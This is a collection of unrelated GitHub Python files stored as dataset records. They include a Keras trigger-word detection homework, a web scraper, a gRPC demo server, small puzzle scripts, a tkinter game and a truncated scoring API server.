1375,所以y是一个 (1,1375)维向量。\r\n\r\n# 但是注意 如果\"activate\"在时间步骤结束,则设置以及最多49个其他连续值。但是,请确保你没有用完数组的末尾并尝试更新 y[0][1375],由于,所以有效索引是 y[0][0] 至y[0][1374]。\r\n# 因此,如果\"activate\" 在1370步结束,则只会得到y[0][1371] = y[0][1372] = y[0][1373] = y[0][1374] = 1\r\n\r\ndef insert_ones(y, segment_end_ms):\r\n \"\"\"\r\n Update the label vector y. The labels of the 50 output steps strictly after the end of the segment\r\n should be set to 1. By strictly we mean that the label of segment_end_y should be 0 while, the\r\n 50 followinf labels should be ones.\r\n\r\n\r\n Arguments:\r\n y -- numpy array of shape (1, Ty), the labels of the training example\r\n segment_end_ms -- the end time of the segment in ms\r\n\r\n Returns:\r\n y -- updated labels\r\n \"\"\"\r\n # 由于segment_end_ms是以10000步为10s 计算的结尾,因此\r\n # 1. 将segment_end_ms转换为对应Ty = 1375的开始位置\r\n segment_end_y = int(segment_end_ms * Ty / 10000.0)\r\n\r\n # 2. 将从segment_end_y+1 开始的之后50步骤全部设定为1\r\n if (Ty - segment_end_y >= 51):\r\n y[:,segment_end_y+1:segment_end_y+51:] = 1\r\n else:\r\n y[:, segment_end_y + 1:Ty:] = 1\r\n return y\r\n\r\n\r\n\r\n# Test OK!\r\n# plt.clf()\r\n# arr1 = insert_ones(np.zeros((1, Ty)), 9700)\r\n# arr1 = insert_ones(arr1, 4251)\r\n# # print (arr1.max(),arr1.min())\r\n# plt.plot(arr1[0,:])\r\n# plt.show()\r\n#\r\n# # plt.show()\r\n# print(\"sanity checks:\", arr1[0][0],arr1[0][1],arr1[0][1374],arr1[0][1333],arr1[0][1334],arr1[0][1335], arr1[0][634], arr1[0][635])\r\n\r\n# 完成上面所有步骤后,我们已经可以从随机的数据中抽取样例,然后和背景10s进行融合,最终得到\r\n# 训练用的Tx片段,和标记着正确输出的Ty片段\r\n\r\n# 练习:实现create_training_example()。你需要执行以下步骤:\r\n#\r\n# 1. 将标签向量初始化为维度为的零numpy数组,shape为(1, Ty)\r\n# 2. 将现有段的集合初始化为一个空列表\r\n# 3. 随机选择0到4个\"activate\"音频剪辑,并将其插入10秒剪辑中。还要在标签向量的正确位置插入标签。\r\n# 4. 
随机选择0到2个负音频片段,并将其插入10秒片段中。\r\n\r\ndef create_training_example(background, activates, negatives):\r\n \"\"\"\r\n Creates a training example with a given background, activates, and negatives.\r\n\r\n Arguments:\r\n background -- a 10 second background audio recording\r\n activates -- a list of audio segments of the word \"activate\"\r\n negatives -- a list of audio segments of random words that are not \"activate\"\r\n\r\n Returns:\r\n x -- the spectrogram of the training example\r\n y -- the label at each time step of the spectrogram\r\n \"\"\"\r\n # 设定随机数种子\r\n np.random.seed(18)\r\n\r\n # 直接将背景减少一定数值,用于减轻背景音量\r\n background = background - 20\r\n\r\n # 1. 初始化Ty输出\r\n y = np.zeros(shape = [1, Ty])\r\n\r\n #2. 初始化一个包含现有插入序列起始位置的列表\r\n previous_segments = []\r\n\r\n #3. 随机选择0到4个activate音频,插入10s背景中,并更新y和previous_segments\r\n number_of_activates = np.random.randint(0, 5) # 随机选取个数\r\n random_indices = np.random.randint(len(activates), size=number_of_activates) # 在指定范围内,随机选取个数个的数字\r\n random_activates = [activates[i] for i in random_indices] # 取出对应的activates\r\n\r\n for activate_index in random_activates:\r\n background,segment_now_index = insert_audio_clip(background,activate_index,previous_segments)\r\n y = insert_ones(y,segment_now_index[1])\r\n\r\n #4. 同理,随机选择0,2个negtive音频,插入background\r\n number_of_positives = np.random.randint(0, 3) # 随机选取个数\r\n random_indices = np.random.randint(len(negatives), size=number_of_positives) # 在指定范围内,随机选取个数个的数字\r\n random_positives = [negatives[i] for i in random_indices] # 取出对应的activates\r\n\r\n for positive_index in random_positives:\r\n background,_ = insert_audio_clip(background,positive_index,previous_segments)\r\n\r\n # 标准化合成完成后的语音\r\n background = match_target_amplitude(background, -20.0)\r\n # file_handle = background.export(\"train\" + \".wav\", format=\"wav\")\r\n # print(\"File (train.wav) was saved in your directory.\")\r\n\r\n return y\r\n\r\n# Test OK!\r\n# y = create_training_example(backgrounds[0], activates, negatives)\r\n# plt.clf()\r\n# plt.plot(y[0])\r\n# plt.show()\r\n\r\n#%% 以上就是完整的数据集处理过程,实际上作业中已经安排好了所有的数据集\r\nx_dev = np.load(r\"C5_W3_HomeWork_Part2_DataSet/XY_dev/X_dev.npy\")\r\ny_dev = np.load(r\"C5_W3_HomeWork_Part2_DataSet/XY_dev/Y_dev.npy\")\r\n\r\nX = np.load(r\"C5_W3_HomeWork_Part2_DataSet/XY_train/X.npy\")\r\nY = np.load(r\"C5_W3_HomeWork_Part2_DataSet/XY_train/Y.npy\")\r\n\r\n# print(x_dev.shape)\r\n# print(y_dev.shape)\r\n\r\n# 使用keras构建模型\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras.models import Model, load_model, Sequential\r\nfrom keras.layers import Dense, Activation, Dropout, Input, Masking, TimeDistributed, LSTM, Conv1D\r\nfrom keras.layers import GRU, Bidirectional, BatchNormalization, Reshape\r\nfrom keras.optimizers import Adam\r\n\r\n# 具体模型参数参看Dataset下的图片Model.png\r\n# (25, 5511, 101)\r\n# (25, 1375, 1)\r\n# 实现model函数\r\n\r\ndef model():\r\n inputs = Input(shape= [Tx,n_freq])\r\n Conv_1D = Conv1D(196,15,strides=4)(inputs)\r\n # print(Conv_1D.shape)\r\n Conv_1D = BatchNormalization()(Conv_1D)\r\n Conv_1D = Activation(activation='relu')(Conv_1D)\r\n Conv_1D = Dropout(0.8)(Conv_1D)\r\n # print(Conv_1D.shape)\r\n # 完成1D卷积之后 shape变更为(batchsize,1375((5511 - kernalsize) / stride + 1),196)\r\n # 将完成卷积的1维序列通过GRU\r\n GRU_Senquence = GRU(128,return_sequences= True)(Conv_1D)\r\n # (batchsize,1375,128)\r\n GRU_Senquence = Dropout(0.8)(GRU_Senquence)\r\n GRU_Senquence = BatchNormalization()(GRU_Senquence)\r\n\r\n #再次通过GRU\r\n GRU_Senquence = GRU(128,return_sequences= True)(GRU_Senquence)\r\n # 
(batchsize,1375,128)\r\n GRU_Senquence = Dropout(0.8)(GRU_Senquence)\r\n GRU_Senquence = BatchNormalization()(GRU_Senquence)\r\n GRU_Senquence = Dropout(0.8)(GRU_Senquence)\r\n\r\n #通过密集连接层和sigmoid输出\r\n Dense_output = Dense(1,activation='sigmoid')(GRU_Senquence)\r\n # (batchsize,1375,1)\r\n\r\n\r\n model = Model(inputs = inputs,outputs = Dense_output)\r\n return model\r\n\r\nmodel = model()\r\n# x_test = np.ones(shape = [25,Tx,n_freq])\r\n# y_test = model.predict(x_test)\r\n# Test OK!\r\n# model.summary()\r\n\r\n# 开始训练\r\nmodel = load_model(r'C5_W3_HomeWork_Part2_DataSet/models/tr_model.h5')\r\nopt = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, decay=0.01)\r\nmodel.compile(loss='binary_crossentropy', optimizer=opt, metrics=[\"accuracy\"])\r\n\r\n#小试2步 检测准确率\r\nmodel.fit(X, Y, batch_size = 5, epochs=1)\r\n\r\n# loss, acc = model.evaluate(x_dev, y_dev)\r\n# print(\"Dev set accuracy = \", acc)\r\n\r\n# 但是由于模型标签严重向0倾斜,因此准确率在这里虽然高于90,但其实是不准确的,这里应该使用例如F1得分或“精确度/召回率”。\r\n\r\n# 下面对模型进行预测\r\ndef detect_triggerword(filename):\r\n plt.clf()\r\n plt.subplot(2, 1, 1)\r\n\r\n x = graph_spectrogram(filename)\r\n # the spectogram outputs (freqs, Tx) and we want (Tx, freqs) to input into the model\r\n x = x.swapaxes(0, 1)\r\n x = np.expand_dims(x, axis=0)\r\n predictions = model.predict(x)\r\n\r\n plt.subplot(2, 1, 2)\r\n plt.plot(predictions[0, :, 0])\r\n plt.ylabel('probability')\r\n plt.show()\r\n return predictions\r\n\r\n# 一旦估计了在每个输出步骤中检测到\"activate\"一词的可能性,就可以在该可能性高于某个阈值时触发出\"chiming(蜂鸣)\"声。\r\n# 此外,在说出\"activate\"之后,对于许多连续值,可能接近1,但我们只希望发出一次提示音。\r\n# 因此,每75个输出步骤最多将插入一次铃声。���将有助于防止我们为\"activate\"的单个实例插入两个提示音。(\r\n# 该作用类似于计算机视觉中的非极大值抑制)\r\n# 实现chime_on_activate()。你需要执行以下操作:\r\n#\r\n# 1.遍历每个输出步骤的预测概率\r\n# 2.当预测大于阈值并且经过了连续75个以上的时间步长时,在原始音频剪辑中插入\"chime\"\r\n\r\nchime_file = r\"C5_W3_HomeWork_Part2_DataSet/audio_examples/chime.wav\"\r\n\r\n\r\ndef chime_on_activate(filename, predictions, threshold):\r\n audio_clip = AudioSegment.from_wav(filename)\r\n chime = AudioSegment.from_wav(chime_file)\r\n Ty = predictions.shape[1]\r\n # Step 1: Initialize the number of consecutive output steps to 0\r\n consecutive_timesteps = 0\r\n # Step 2: Loop over the output steps in the y\r\n for i in range(Ty):\r\n # Step 3: Increment consecutive output steps\r\n consecutive_timesteps += 1\r\n # Step 4: If prediction is higher than the threshold and more than 75 consecutive output steps have passed\r\n if predictions[0, i, 0] > threshold and consecutive_timesteps > 75:\r\n # Step 5: Superpose audio and background using pydub\r\n audio_clip = audio_clip.overlay(chime, position=((i / Ty) * audio_clip.duration_seconds) * 1000)\r\n # Step 6: Reset consecutive output steps to 0\r\n consecutive_timesteps = 0\r\n\r\n audio_clip.export(r\"C5_W3_HomeWork_Part2_DataSet/output/chime_output_dev2.wav\", format='wav')\r\n\r\n# Test OK!\r\n# filename = r\"C5_W3_HomeWork_Part2_DataSet/raw_data/dev/1.wav\"\r\n# prediction = detect_triggerword(filename)\r\n# chime_on_activate(filename, prediction, 0.5)\r\n\r\n# filename = r\"C5_W3_HomeWork_Part2_DataSet/raw_data/dev/2.wav\"\r\n# prediction = detect_triggerword(filename)\r\n# chime_on_activate(filename, prediction, 0.4)\r\n\r\n","repo_name":"ShinewineW/LearningSmth","sub_path":"WuDeepLearningCourse/C5_W3_HomeWork_Part2.py","file_name":"C5_W3_HomeWork_Part2.py","file_ext":"py","file_size_in_byte":20261,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} 
+{"seq_id":"27579328602","text":"#####################################################################################################\n##\n## Get Data Engine\n##\n## Author: Manilson Antonio Lussati\n## Date: 04/02/2021\n##\n#####################################################################################################\n\nimport time\nimport pandas as pd\nimport requests\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport schedule\n\nURI = 'https://oilprice.com/oil-price-charts/#prices'\n\ndef get_list_from_data(str_data):\n list_str_data = str_data.split('(')\n return list_str_data[0]\n\n\ndef replace_specific(text):\n \n text = text.replace('(2 \\tdays Delay)', '')\n \n return text\n\n \ndef get_df_from_page_html(): \n req = requests.get(URI)\n if req.status_code == 200:\n print('Requisição bem sucedida!')\n content = req.content\n soup = BeautifulSoup(content, 'html.parser')\n table = soup.find_all(\"table\", class_=\"oilprices__table\")\n table_str = str(table)\n df = pd.read_html(table_str)[2]\n df_g = pd.read_html(table_str)[1]\n\n # Juntando os dados\n print('Juntando os dados')\n df_g = df_g[df_g[1].isin(['Girassol SellBuy'])]\n df = df[df[1].isin(['Cabinda SellBuy', 'Nemba SellBuy', 'Dalia SellBuy'])]\n\n df_join = df.append(df_g, ignore_index=True)\n\n print('DATAFRAME G: ', len(df_g))\n print('DATAFRAME : ', len(df))\n print('DATAFRAME JOIN: ', len(df_join))\n try:\n # Fazendo o tratamento dos dados\n df_join.rename(columns = {1:'pocos', 2:'price', 3:'change', 4:'%_change'}, inplace = True)\n df_join['pocos'] = df_join['pocos'].str.replace('SellBuy','')\n df_join['%_change'] = df_join['%_change'].apply(replace_specific)\n df_join.drop([0, 5], axis=1, inplace=True)\n df_join['%_change'] = df_join['%_change'].apply(get_list_from_data)\n df_join['data'] = datetime.today().strftime('%Y-%m-%d')\n df_join.reset_index(drop=True)\n df_join.to_excel('data/price_oil_{}.xlsx'.format(datetime.today().strftime('%Y-%m-%d')), index = False, header=True)\n print(df_join)\n return 'Done'\n except Exception as e:\n print('Alguma coisa deu errado: ', e)\n return e\n \ndef main():\n get_df_from_page_html()\n\nif __name__ == '__main__':\n main()","repo_name":"PalancaData-Community/open-data-web-scrapy","sub_path":"get_file_price_oil.py","file_name":"get_file_price_oil.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39486148175","text":"from route_pb2_grpc import RouteGuideServicer as _RouteGuideService, add_RouteGuideServicer_to_server\nfrom route_pb2 import structured_data\nfrom random import uniform\n\n\nclass RouteGuideServicer(_RouteGuideService):\n def __init__(self):\n super().__init__()\n\n def GetTimings(self, request_iterator, context):\n for iteration in request_iterator:\n print('fucking iteration', iteration)\n yield structured_data(\n service_name='Tester',\n uptime_duration=uniform(1.0, 10000.00),\n request_duration=uniform(1.0, 10000.00)\n )\n\n\nif __name__ == '__main__':\n def _start_server(server, port='[::]:50051'):\n server.add_insecure_port(port)\n print('server started!!!!!')\n server.start()\n server.wait_for_termination()\n\n import grpc\n from concurrent import futures\n _server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))\n add_RouteGuideServicer_to_server(\n RouteGuideServicer(), _server\n )\n 
_start_server(_server)\n\n\n\n","repo_name":"mahdithejedi/docs","sub_path":"gRPC/GoogleRouteExample/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27963643423","text":"import os\nimport openai\n\nwith open('/Users/marc/coding/projects/api/chatgpt/key.txt', 'r') as file:\n data = file.read().replace('\\n', '')\n\nopenai.api_key = data\n\n\nprompt1 = \"Who are the top 20 female athletes of all time?\"\ncompletion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"user\", \"content\": input(\"You: \")}\n ]\n)\n\nprint(completion.choices[0].message.content)\n","repo_name":"marc-maurice/portfolio","sub_path":"chatgpt/chatgpt_single_question.py","file_name":"chatgpt_single_question.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5630249392","text":"import json\nimport torch\nfrom fairseq.models.roberta import RobertaModel\nfrom examples.roberta import qnli_ranking # load the Pairwise Ranking QNLI task\nimport argparse\nfrom collections import OrderedDict\nimport os\nimport pdb\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--model-path\", default=\"/scratch0/roberta-chks/freeadv-qnliranking-iters33112-warmup1986-lr1e-05-bsize1-freq16-advlr5e-2-advstep2-initmag1e-2-fp32-seed9017-beta0.999\", type=str)\nparser.add_argument(\"--chk-name\", default=\"checkpoint_best.pt\", type=str)\nparser.add_argument(\"--out-path\", default=\"QNLI-ranking-res\", type=str)\nparser.add_argument(\"--test-fname\", default=\"test.jsonl\", type=str)\nparser.add_argument(\"--num\", default=0, type=int)\nparser.add_argument(\"--gpu\", default=\"0\", type=str)\nargs = parser.parse_args()\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.gpu\n\nroberta = RobertaModel.from_pretrained(args.model_path, args.chk_name, 'QNLI-pair-bin')\nroberta.eval() # disable dropout\nroberta.cuda() # use the GPU (optional)\nnsamples, ncorrect = 0, 0\nres_dict = OrderedDict()\nscores_list = []\nwith open(os.path.join('QNLI-pair-bin', args.test_fname)) as h:\n with torch.no_grad():\n for line in h:\n example = json.loads(line)\n if example['sent1'] == None:\n res_dict[example['idxes'][0]] = 'entailment' # write entailment for lonely senteneces\n ncorrect += 1\n pdb.set_trace()\n else:\n scores = []\n choices = [example['sent0'], example['sent1']]\n for choice in choices:\n input = roberta.encode(\n 'Q: ' + example['ques'],\n 'A: ' + choice,\n no_separator=True\n )\n score = roberta.predict('sentence_classification_head', input, return_logits=True)\n scores.append(score)\n\n scores_list.append({'idxes': example['idxes'], 'scores': scores})\n\n if scores[0] > scores[1]:\n reses = ['entailment', 'not_entailment']\n if 'label' in example:\n ncorrect += example['label'] == 0\n else:\n reses = ['not_entailment', 'entailment']\n if 'label' in example:\n ncorrect += example['label'] == 1\n for idx, res in zip(example['idxes'], reses):\n res_dict[idx] = res\n nsamples += 2\n\nif not os.path.exists(args.out_path):\n os.makedirs(args.out_path)\nfs = open(os.path.join(args.out_path, \"QNLI.tsv\"), \"w+\")\nfs.write(\"id\\tlabel\\n\")\nint_keys = [int(k) for k in res_dict.keys()]\nsorted_keys = sorted(int_keys)\nfor key in sorted_keys:\n if key == -1:\n # these are auxiliary keys\n continue\n 
fs.write(\"%s\\t%s\\n\"%(str(key), res_dict[str(key)]))\n\nfs.close()\n\ntorch.save({\"model\": args.model_path, \"scores_list\": scores_list}, os.path.join(args.out_path, \"scores\", \"QNLI_%d.pt\"%args.num))\n\nprint(\"Accuracy: {}\".format(float(ncorrect*2)/nsamples))\nprint(\"Done.\")","repo_name":"zhuchen03/FreeLB","sub_path":"fairseq-RoBERTa/examples/roberta/qnli_ranking/gen_test_res.py","file_name":"gen_test_res.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"53"} +{"seq_id":"17935288555","text":"import math\n\ndef get_factores(number):\n divisors = [1]\n for i in range(2,math.isqrt(number) + 1):\n if number % i == 0:\n divisors.append(i)\n q = number // i\n if q !=i:\n divisors.append(q)\n return divisors\n\ndef is_amicable(number):\n sum_divisors_own_a = sum(get_factores(number))\n sum_divisors_own_b = sum(get_factores(sum_divisors_own_a))\n if number == sum_divisors_own_b and sum_divisors_own_a!=sum_divisors_own_b:\n return True\n else:\n return False\n\ndef main(MAX):\n numbers_amicables = []\n for number in range(1,MAX):\n if is_amicable(number):\n numbers_amicables.append(number)\n suma_amicables = sum(numbers_amicables)\n print(\"La suma de todos los numeros amigables menores a {} es:{}\".format(MAX,suma_amicables))\n\nmain(10000)\n\n","repo_name":"elterribleabuelo/Project-Euler","sub_path":"problem021.py","file_name":"problem021.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40248362314","text":"#!/usr/bin/env python3\n\"\"\"\nset_station.py\n\nPurpose: Allows changes to a station, such as speed restrictions and availability\n\nAuthor: Cody Jackson\n\nDate: 2/5/19\n################################\nVersion 0.1\n Initial build\n\"\"\"\n\nimport argparse\n\nimport sys\nsys.path.extend([\"/home/cody/PycharmProjects/Transportation_model\"])\n\nfrom archive.database import Base, StationStatus\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef arg_parser():\n \"\"\"Capture transportation orders from user.\"\"\"\n parser = argparse.ArgumentParser(description=\"Update train station status.\")\n parser.add_argument(\"db_location\", help=\"Path of database to use.\")\n parser.add_argument(\"station\", help=\"Station identification. Options: 'Station 1', 'Station 2', 'Station 3, \"\n \"'Station 4'\")\n parser.add_argument(\"--status\", default=True, type=bool, help=\"Station status. Operational = True; Closed = False\")\n parser.add_argument(\"--speed\", default=10, type=str, help=\"Speed limit for the station. Default = 10\")\n parser.add_argument(\"--empty\", default=True, type=bool, help=\"Station available for train. 
\"\n \"Station available = True; Occupied = False\")\n var_args = vars(parser.parse_args())\n\n return var_args\n\n\ndef access_db(path):\n \"\"\"Establish connection to created database.\"\"\"\n engine = create_engine(\n \"sqlite:///{}\".format(path)) # Interact w/ DB file\n Base.metadata.bind = engine # Bind engine to Base to access classes\n\n db_session = sessionmaker(bind=engine) # Establish comms with DB\n session = db_session() # Create staging area\n\n return session\n\n\ndef update_station(session, station_id, status=True, speed=10, empty=True):\n \"\"\"Change the status of a station.\"\"\"\n station = session.query(StationStatus).filter(StationStatus.station_id == station_id).one()\n station.station_status = status\n station.speed_restriction = speed\n station.track_status = empty\n\n session.add(station)\n session.commit()\n session.close()\n\n\nif __name__ == \"__main__\":\n user_args = arg_parser()\n db_path = user_args[\"db_location\"]\n station_name = user_args[\"station\"]\n working_status = user_args[\"status\"]\n restrict_speed = user_args[\"speed\"]\n available = user_args[\"empty\"]\n\n db_access = access_db(db_path)\n update_station(db_access, station_name, working_status, restrict_speed, available)\n","repo_name":"crystalattice/Rail_model","sub_path":"archive/set_station.py","file_name":"set_station.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35948155322","text":"import os\ndizin=os.getcwd() #os.getcwd() Fonksiyonu Çalışma Dizininin Yoludur\nprint(dizin)\n\n\ntry:\n os.chdir(\"C:\\\\test\") #Programın Çalışma Dizini \"C:\\test\" olarak Ayarlanmıştır\n yeni_dizin=os.getcwd()\n print(yeni_dizin)\n\nexcept FileNotFoundError:\n print(\"Böyle Bir Yol Bulunamadı\")\n os.mkdir(\"C:\\\\test\")\n print(\"Oluşturluyor....\")\n \n","repo_name":"C3lalAydin/Python","sub_path":"Örnekler/Sayfa 176-186 Dosya İşlemleri/Örnekler 176-181/Sayfa 179 Çalışma Dizini Değiştirme.py","file_name":"Sayfa 179 Çalışma Dizini Değiştirme.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36413506390","text":"def movingavg(Sample ,window):\r\n\tzmoving=[]\r\n\tmovingvalues=0\r\n\tfor index in range(0,window):\r\n\t\tmovingvalues+=Sample[index]\r\n\tzmoving.append(movingvalues/window)\r\n\t\r\n\tsize=len(Sample)-window+1\r\n\t\r\n\txaxis=[i for i in range(0,len(Sample))]\r\n\r\n\tfor index in range(1,size):\r\n\t\tmovingvalues+=Sample[index+window-1]-Sample[index-1]\r\n\t\tzmoving.append(movingvalues/(window/2 +1))\r\n\tsize=len(Sample)\r\n\tstart=size-window+1\r\n\tfor index in range(start,size):\r\n\t\t\tzmoving.append(Sample[index])\r\n\tplt.plot(xaxis,Sample[0:len(Sample)],'r',zmoving[0:len(Sample)],'b')\r\n\tplt.show()\r\n\t\r\n\r\nplt.figure(1)\r\nplt.plot(xaxis[0:len(Z)],Z[0:len(Z)],'g')\r\nplt.show()\r\nplt.close()\r\n\r\n\r\nprint(len(latitude))\r\nprint(len(Z))\t\r\n\r\n\r\nmovingavg(Z[0:64],4)\r\n","repo_name":"saainithil97/roadsafe","sub_path":"movingaverage.py","file_name":"movingaverage.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21048944657","text":"import random\nimport tkinter as tk\n\n# Define game constants\nOPTIONS = ['rock', 'paper', 'scissors']\nWIN_CONDITIONS = {\n 'rock': 'scissors',\n 'paper': 'rock',\n 'scissors': 'paper'\n}\n\n# Initialize 
scores\nplayer_score = 0\ncomputer_score = 0\n\n# Create GUI window\nroot = tk.Tk()\nroot.title(\"Rock Paper Scissors\")\n\n# Define score label widgets\nplayer_label = tk.Label(root, text=\"Player: 0\")\nplayer_label.grid(row=0, column=0)\n\ncomputer_label = tk.Label(root, text=\"Computer: 0\")\ncomputer_label.grid(row=1, column=0)\n\nresult_label = tk.Label(root, text=\"\")\nresult_label.grid(row=2, column=0)\n\n# Define button click functions\n\n\ndef play(option):\n global player_score, computer_score\n computer_choice = random.choice(OPTIONS)\n\n if option == computer_choice:\n result_label.config(text=\"Tie game!\")\n elif WIN_CONDITIONS[option] == computer_choice:\n result_label.config(text=\"Player wins!\")\n player_score += 1\n player_label.config(text=\"Player: {}\".format(player_score))\n else:\n result_label.config(text=\"Computer wins!\")\n computer_score += 1\n computer_label.config(text=\"Computer: {}\".format(computer_score))\n\n\n# Define button widgets\nrock_button = tk.Button(root, text=\"Rock\", command=lambda: play('rock'))\nrock_button.grid(row=3, column=0, padx=10, pady=10)\n\npaper_button = tk.Button(root, text=\"Paper\", command=lambda: play('paper'))\npaper_button.grid(row=3, column=1, padx=10, pady=10)\n\nscissors_button = tk.Button(root, text=\"Scissors\",\n command=lambda: play('scissors'))\nscissors_button.grid(row=3, column=2, padx=10, pady=10)\n\n# Start GUI loop\nroot.mainloop()\n","repo_name":"R3DHULK/python-for-gui-gamers","sub_path":"rock-paper-scissor-gui-with-scoreboard.py","file_name":"rock-paper-scissor-gui-with-scoreboard.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27625666437","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport json\nimport logging\nimport hashlib\nimport uuid\nfrom optparse import OptionParser\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom typing import Dict, List, Tuple\n\nfrom req import ClientsInterestsRequest, MethodRequest, OnlineScoreRequest\nfrom scoring import get_score, get_interests\n\nSALT = \"Otus\"\nADMIN_SALT = \"42\"\nOK = 200\nBAD_REQUEST = 400\nFORBIDDEN = 403\nNOT_FOUND = 404\nINVALID_REQUEST = 422\nINTERNAL_ERROR = 500\nERRORS = {\n BAD_REQUEST: \"Bad Request\",\n FORBIDDEN: \"Forbidden\",\n NOT_FOUND: \"Not Found\",\n INVALID_REQUEST: \"Invalid Request\",\n INTERNAL_ERROR: \"Internal Server Error\",\n}\nUNKNOWN = 0\nMALE = 1\nFEMALE = 2\nGENDERS = {\n UNKNOWN: \"unknown\",\n MALE: \"male\",\n FEMALE: \"female\",\n}\n\n\ndef check_auth(request):\n if request.is_admin:\n string_to_hash = datetime.now().strftime(\"%Y%m%d%H\") + ADMIN_SALT\n digest = hashlib.sha512(string_to_hash.encode()).hexdigest()\n else:\n string_to_hash = request.account + request.login + SALT\n digest = hashlib.sha512(string_to_hash.encode()).hexdigest()\n if digest == request.token:\n return True\n return False\n\n\ndef get_valid_request(request_body, request_class):\n request = request_class()\n err_msg = None\n request_params = {\n n: a for n, a in request_class.__dict__.items() if hasattr(a, \"required\")\n }\n for param_name, param in request_params.items():\n try:\n param_value = request_body[param_name]\n except KeyError:\n if param.required:\n request = None\n err_msg = f\"Request does not contain the field '{param_name}'\"\n break\n continue\n try:\n setattr(request, param_name, param_value)\n except TypeError as exception:\n request = None\n err_msg = 
str(exception)\n break\n\n return err_msg, request\n\n\ndef get_score_response(\n request: MethodRequest\n) -> Tuple[int, Dict[str, int], List[str]]:\n \"\"\"Return info of response to online score request.\"\"\"\n if request.is_admin:\n return OK, {\"score\": 42}, []\n\n err_message, score_req = get_valid_request(\n request.arguments,\n OnlineScoreRequest\n )\n\n if score_req:\n try:\n know_contacts = score_req.phone and score_req.email\n know_full_name = score_req.first_name and score_req.last_name\n know_bio = score_req.gender is not None and score_req.birthday\n correct_req = know_contacts or know_full_name or know_bio\n if not correct_req:\n err_text = 'The request does not contain any of the pairs: '\n pairs = 'phone-email, first_name-last_name, gender-birthday'\n err_message = err_text + pairs\n except AttributeError as exception:\n err_message = str(exception)\n\n response = err_message\n return_code = INVALID_REQUEST\n req_params = {}\n\n if not err_message:\n req_params = {n.lstrip(\"_\"): v for n, v in score_req.__dict__.items()}\n positional_arg_names = [\"phone\", \"email\"]\n args = {n: None for n in positional_arg_names}\n score = get_score(None, **{**args, **req_params})\n response = {\"score\": score}\n return_code = OK\n\n return return_code, response, list(req_params.keys())\n\n\ndef get_client_interests_response(\n request: MethodRequest,\n) -> Tuple[int, Dict[int, List[str]]]:\n \"\"\"Return an error code and a response to client interests request.\"\"\"\n err_message, client_interests_request = get_valid_request(\n request.arguments,\n ClientsInterestsRequest\n )\n response = err_message\n return_code = INVALID_REQUEST\n if not err_message:\n client_ids = client_interests_request.client_ids\n response = {i: get_interests(1, 1) for i in client_ids}\n return_code = OK\n return return_code, response\n\n\ndef method_handler(request, context, store):\n request_body = request.get(\"body\")\n return_code = INVALID_REQUEST\n response = None\n error = None\n if request_body:\n logging.info(\"Successfully get request body.\")\n error, method_request = get_valid_request(request_body, MethodRequest)\n if method_request:\n logging.info(f\"Request is valid (id: {context.get('request_id')}.\")\n successful_auth = check_auth(method_request)\n return_code = FORBIDDEN\n if successful_auth:\n request_method = method_request.method\n if request_method == \"online_score\":\n return_code, response, filled_fields = get_score_response(\n method_request\n )\n if return_code == OK:\n context[\"has\"] = filled_fields\n elif request_method == \"clients_interests\":\n return_code, response = get_client_interests_response(\n method_request\n )\n if return_code == OK:\n context[\"nclients\"] = len(response)\n else:\n err_msg = f\"The invalid request method {request_method}\"\n logging.error(err_msg + str(context))\n return_code = BAD_REQUEST\n\n response = response or error\n return response, return_code\n\n\nclass MainHTTPHandler(BaseHTTPRequestHandler):\n router = {\n \"method\": method_handler\n }\n store = None\n\n def get_request_id(self, headers):\n return headers.get(\"HTTP_X_REQUEST_ID\", uuid.uuid4().hex)\n\n def do_POST(self):\n response, code = {}, OK\n context = {\"request_id\": self.get_request_id(self.headers)}\n logging.info(f'Request handling started. 
